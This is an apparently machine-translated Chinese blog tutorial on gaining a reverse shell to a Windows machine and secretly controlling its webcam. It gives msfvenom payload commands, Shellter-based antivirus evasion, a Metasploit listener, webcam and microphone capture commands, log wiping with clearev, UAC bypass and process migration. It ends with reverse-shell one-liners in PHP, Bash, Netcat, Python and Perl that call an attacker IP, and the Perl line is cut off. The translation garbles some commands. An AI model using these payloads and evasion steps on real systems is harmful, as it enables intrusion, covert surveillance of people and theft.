反向外壳和控制网络摄像头

如果你有一块胶带覆盖你的网络摄像头,你很可能听说过黑客或国家安全局可以远程监视你。问题是如何实现?您从未见过的远方的人如何能够远程连接到您的机器并监视您?

现在可能是您的闭路电视,IP摄像机只是暴露在互联网上,攻击者在Shodan等网站上找到了它。您尚未更改默认密码和 bam,它们位于。看着你的一举一动。

物联网摄像机通常就是这种情况。但是,如果我们谈论您的内置网络摄像头,答案更有可能是通过Meterpreter有效负载。Meterpreter可以让您访问反向外壳,这就是我们将在下面介绍的内容。有关 Meterpreter 的更多信息,请阅读此处:

你可能会想,为什么是反向外壳?他们为什么不直接访问我的机器?好吧,因为这种方法很可能会被阻止。我们倾向于限制入站流量比限制出站流量多得多。如果有人想连接到您的计算机,您的计算机很可能会阻止它(除非抬起)。另一方面,如果您尝试连接到它们,则您的计算机更有可能让此流量通过。这是因为您的计算机是想要建立连接的机器。

msfvenom 是一个框架,我们将用它来获取反向 shell。它已经预装在Parrot和Kali上。让我们运行以下命令来创建 Meterpreter 反向 TCP shell 负载。

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.X.X LPORT=4444 -o /home/parrot/name.exe

工作完成。现在让我们上传它,然后……….被阻止。这是因为MeterPreter是一个众所周知的有效载荷,因此大多数防病毒软件都能够阻止/隔离它。除非您正在处理现在仍然存在的不安全客户端。

我们可以使用一个名为Shellter的工具,它尝试更改哈希并将反向shell嵌入到另一个文件中。通常,有人选择将 shell 嵌入到安装文件中。原因是大多数安装文件需要以管理员身份运行。正如您稍后将看到的,以管理员身份运行漏洞利用程序可以消除所有艰苦的工作。

您可以通过简单地运行其庇护所来开始庇护所。同样,这是用Parrot和Kali预装的。

现在,让我们使用 Auto [A],并针对我为此示例创建的可执行文件。

接下来,我们选择反向TCP shell并输入我们机器的IP和端口(攻击者)。完成后,它会将 shell 嵌入到您选择的 exe 中,以便您可以将其上传到目标计算机。现在,您将必须使用一种复杂的方法将其放入目标计算机上,但对于此示例,我将复制并粘贴。

然而,尽管屏蔽了Meterpreter外壳,但AV还是设法检测到了它。我现在要把它关掉,因为我可以。在现实世界中,攻击者会试图削弱AV或将其遮挡,以便他们可以丢弃有效载荷。

现在,攻击程序位于目标计算机上,让我们运行它。 在我们这样做之前,让我们在攻击机器上加载msfconsole(Metasploit)并运行以下命令:

msfconsole 使用多/处理程序设置有效负载窗口/仪表/reverse_tcp设置 LHOST 192.168.X.X 设置 LPORT 4444 运行

您的会话现在将侦听反向 shell 脚本中指定的端口和 IP。现在,让我们让用户运行漏洞利用程序:

正如你在右边看到的,我们有几个失败。这就是我之前提到的需要用户以管理员身份运行它的内容。这样就可以运行和注入所有脚本和 DLL。如果用户以管理员身份运行它,则不会看到任何失败。这样:

这是你可以开始玩的时候。攻击者可以在您的计算机上执行多项操作,但如果他们想要使用网络摄像头,他们会执行以下操作:

显示网络摄像头: webcam_list
网络摄像头快照 帮助: webcam_snap -h
拍照后不加载图像: webcam_snap -i 1 -v false
录制音频: record_mic
录制摄像头: 运行网络摄像头 -p /var/www/
停止录制: 运行网络摄像头 -s

说奶酪!!!

摘自《机器人先生》

这不仅仅是网络摄像头。您可以运行更多命令。例如: 清除所有日志(应用程序、系统和安全日志): clearev

这是一个例子,因为黑客不太可能运行这个。这是因为做这样的事情会提醒某人。如果您发现一台机器的日志已经完成擦除,您可以打赌有人一直在使用它。相反,攻击者很可能会删除选定的事件,以掩盖其踪迹。现在需要敏锐的眼光来发现诸如时间差距之类的东西。

所有这些都需要管理员权限,并且您的用户可能不会使用升级的权限运行它。这很好,因为你可以使用像bypassuac_comhijacker这样的东西。您仍然必须首先获得反向 shell,但它可以在用户级别。

获得外壳后,输入 背景 并按回车键。这会将当前会话移到后台。然后,您可以交换到漏洞利用bypassuac_comhijack如下所示:

然后,您可以翻转回原始会话并运行以下命令:

如果完成,它应该会给你一个管理外壳。完成此操作后,您将需要迁移到更稳定的进程。并不是说你会想象你已经把你的反向shell隐藏在Putty exe或安装程序文件中。一旦他们关闭应用程序,您的连接将断开,您可能无法获得另一个。这就是您希望快速迁移到不断运行的内容的原因。

首先,让我们查看正在运行的进程。要执行此操作,请运行 ps

找到稳定的进程后,运行 迁移 [PID]

然后,这会将您的 Meterpreter 会话迁移到另一个进程。如果他们关闭被利用的应用程序,您的会话现在将保留。

正如你所看到的,Meterpreter非常强大!问题是我不得不手动禁用安全控制。如果客户端是半安全的,它们很可能会阻止你的有效负载。这就是为什么反向 shell 有效负载通常在利用漏洞时交付的原因。该漏洞可能允许他们上传并运行有效负载,以便他们可以建立 Meterpreter 会话。

不过,Meterpreter并不是获得反向外壳的唯一方法。可以使用一个名为Netcat的漂亮工具。正如您在下面看到的,您可能会对此更加幸运,因为某些AV供应商不将其视为威胁。

https://www.virustotal.com/gui/file/be4211fe5c1a19ff393a2bcfa21dad8d0a687663263a63789552bda446d9421b/detection

Netcat可以在Parrot或Kali上usr/share/windows-binaries/nc.exe下找到。一旦您将nc.exe上传到目标机器上,我们就可以运行nc.exe [攻击者IP] [端口] -e cmd.exe。 这是您最有可能通过脚本自动执行的操作。

在攻击者机器上,我们需要监听连接 这可以通过运行来完成: nc -lvp [所选端口]

这将为您提供一个非常简单的反向外壳。它只有用户级别权限,但它是一个起点。然后,您可以使用它进一步利用系统以获取管理员权限。您不必总是拥有管理员权限即可完成很多事情。如果攻击者设法获得shell,他们可以简单地开始窃取或删除文件。简单但有效。以下是运行反向 shell 的更多示例:

PHP
php -r ‘$sock=fsockopen(“192.168.0.10”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’

Bash
bash -i >& /dev/tcp/192.168.0.1/8080 0>&1

Netcat Linux
nc 192.168.0.10 1234 -e /bin/sh

Python
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.0.10”,1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’

Perl
perl -e ‘use Socket;$i=“192.168.0.10”;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i))))){open(STDIN,“>&S”);open(STDOUT,

Advertisement

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Create a website or blog at WordPress.com

%d bloggers like this: